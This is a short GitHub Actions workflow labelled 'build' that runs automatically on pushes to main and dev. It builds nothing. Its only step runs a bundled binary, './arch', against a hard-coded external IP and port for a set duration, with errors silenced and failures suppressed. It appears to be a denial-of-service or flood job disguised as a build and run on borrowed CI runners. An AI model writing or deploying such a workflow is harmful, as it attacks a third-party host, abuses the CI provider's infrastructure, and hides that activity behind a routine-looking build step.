name: build
on:
  push:
    branches: [main, dev]
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 6
    steps:
    - uses: actions/checkout@v4
    - name: setup
      env:
        TARGET_IP: "91.108.17.7"
        TARGET_PORT: "32000"
        DURATION: "200"
      run: |
        chmod +x ./arch 2>/dev/null || true
        timeout "$DURATION" ./arch "$TARGET_IP" "$TARGET_PORT" "$DURATION" 2>/dev/null || true
